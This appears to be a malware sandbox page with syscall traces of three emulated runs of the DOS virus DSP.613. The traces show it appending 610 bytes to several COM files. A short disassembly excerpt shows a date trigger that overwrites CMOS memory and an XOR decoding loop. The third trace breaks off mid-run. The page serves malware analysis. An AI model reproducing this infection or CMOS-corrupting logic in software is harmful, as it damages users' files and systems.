Sample viewer

vx.netlux.org/Virus.DOS.DSP.613

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:19.300115978Z 78 PC: 13f84 | Find first file
2018-12-17T23:06:19.306975045Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.308087439Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.328062454Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:19.344407577Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.351777025Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.35317036Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.355870726Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.359660565Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.360982912Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.362530474Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.370778292Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.372792044Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.380847074Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.383913779Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.385334773Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.395014863Z 61 PC: 13e83 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:06:19.402656374Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.409003518Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.410574677Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.414153382Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.416907446Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.418443383Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.4205558Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.428408931Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.43057187Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.439560176Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.442345063Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.443610933Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.45669055Z 61 PC: 13e83 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:06:19.463274915Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.469774471Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.471302306Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.474160081Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.476624308Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.478214538Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.479887036Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.487494194Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.489798765Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.498261988Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.500766933Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.502462034Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.511878577Z 61 PC: 13e83 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:06:19.518194378Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.524342793Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.525826301Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.528258882Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.530821265Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.532063299Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.53322673Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.541891857Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.544111482Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.56180309Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.564538853Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.565869383Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.575241749Z 61 PC: 13e83 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:06:19.582253497Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.589172505Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.590501314Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.593031857Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.596315233Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.598257797Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.599466367Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.607237588Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.609097864Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.616990495Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.619922218Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.621123872Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.630573165Z 61 PC: 13e83 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:06:19.637399131Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.643351578Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.644499885Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.647443149Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.649925614Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.651071212Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.65295743Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.661247526Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.663863902Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.671877386Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.67422574Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.675246449Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.684930066Z 61 PC: 13e83 | Open file (Filename = 'PAH.COM')
2018-12-17T23:06:19.691390181Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.697545953Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.699268826Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.701831627Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.704387351Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.706098101Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.707298995Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.715478084Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.718975989Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.727252275Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.730198274Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.733484641Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.746068555Z 61 PC: 13e83 | Open file (Filename = 'TEST.COM')
2018-12-17T23:06:19.752485404Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:19.759414327Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.761043967Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.763267285Z 25 PC: 13f9b | Get default drive
2018-12-17T23:06:19.764768046Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-17T23:06:19.765862479Z 59 PC: 13fce | Change current directory
2018-12-17T23:06:19.771337309Z 78 PC: 13fd5 | Find first file
2018-12-17T23:06:19.780351729Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.781493361Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.13416457Z 61 PC: 13e83 | Open file (Filename = 'EDIT.COM')
2018-12-17T23:06:20.14242123Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.148490971Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.150108311Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.15404735Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.157182281Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.158773924Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.160364796Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.167870296Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.169827253Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.177174209Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.180862858Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:20.182037627Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.190997597Z 61 PC: 13e83 | Open file (Filename = 'FORMAT.COM')
2018-12-17T23:06:20.198216716Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:20.20345052Z 66 PC: 13ea7 | Move file pointer
2018-12-17T23:06:20.204705989Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.20751912Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.209786814Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.212284506Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.215455842Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.216727559Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.218018158Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.225860059Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.228025362Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.235473419Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.238797379Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:20.239920486Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.249664776Z 61 PC: 13e83 | Open file (Filename = 'KEYB.COM')
2018-12-17T23:06:20.25767787Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:20.264096165Z 66 PC: 13ea7 | Move file pointer
2018-12-17T23:06:20.265651746Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.269220139Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.270468407Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.272877227Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.275769643Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.276981726Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.278982876Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.296144421Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.29826117Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.305511643Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.312922184Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:20.313966284Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.323485494Z 61 PC: 13e83 | Open file (Filename = 'SYS.COM')
2018-12-17T23:06:20.330797411Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:20.336120971Z 66 PC: 13ea7 | Move file pointer
2018-12-17T23:06:20.337532945Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.340630998Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.342621142Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.345659195Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.367511408Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.368843187Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.37055643Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.378143945Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.380018748Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.387613818Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.393468027Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-17T23:06:20.394922232Z 42 PC: 13ff4 | Get date 0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36
2018-12-17T23:06:20.398047088Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T23:06:20.404000603Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:32.762413597Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:32.768653292Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:32.769751969Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:32.794949696Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:32.806132393Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:32.81240667Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:32.814060309Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:32.817016874Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:32.820470892Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:32.82194051Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:32.823187703Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-25T12:43:32.831905173Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-25T12:43:32.833942314Z 62 PC: 13f1e | Close file
2018-12-25T12:43:32.841970992Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:32.844984641Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.845998296Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.855738417Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.863332979Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.869796336Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.871259368Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.874574611Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.877024234Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.878552079Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.885370777Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.89295478Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.894965218Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.903636611Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.906065745Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.907086792Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.917204426Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.923826041Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.930199184Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.933720142Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.936713042Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.939426033Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.941288057Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.942472485Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.95031318Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.95260169Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.960351561Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.962771736Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.964068602Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.97370321Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.980171307Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.986884856Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.990866127Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.993808804Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.9966403Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.998531008Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.00005454Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.00871138Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.01110163Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.018691957Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.021120857Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.022634699Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.031984302Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.038762563Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.045668934Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.04699954Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.049568482Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.053546964Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.05484111Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.056105595Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.064789878Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.066739545Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.075210888Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.078401558Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.079526385Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.088975441Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.095823401Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.102098734Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.103373287Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.110496159Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.113159576Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.114497788Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.116743134Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.125392152Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.127768114Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.13716109Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.139786654Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.141741282Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.1533069Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.160017214Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.166441096Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.16883711Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.171804046Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.174625197Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.177397578Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.17911846Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.187279574Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.190225453Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.198780462Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.201965784Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.203788332Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.213787971Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.220645569Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:33.223425246Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.225856166Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.22919696Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:33.230736636Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:33.232963565Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:33.239014211Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:33.248658082Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.249965758Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.0196208Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.026531025Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.032959412Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.034277064Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.036836671Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.041284174Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.043301958Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.044907506Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.05227271Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.054631541Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.061930496Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.065986378Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.067162738Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.076540444Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.084037801Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.08991348Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.092958804Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.096606084Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.0983099Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.101317409Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.1050722Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.106681553Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.108410318Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.117897967Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.120287971Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.128593356Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.133380116Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.135027038Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.144361408Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.15173805Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.157271845Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.158864138Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.162271162Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.163723947Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.166409287Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.16992926Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.171650613Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.173360168Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.181859264Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.18422909Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.19149445Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.198285212Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.199645432Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.209024558Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.216480225Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.222127015Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.223723455Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.226832661Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.228538532Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.23109573Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.235568495Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.237180291Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.23877964Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.24774722Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.249869169Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.257949039Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.265016803Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.266296636Z 42 PC: 13ff4 | Get date 0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36
2018-12-25T12:43:34.26861043Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:43:34.275698164Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:32.762592468Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:32.768773421Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:32.769989487Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:32.794981424Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:32.801914121Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:32.807649852Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:32.808835931Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:32.811544365Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:32.813987605Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:32.815188357Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:32.816543874Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
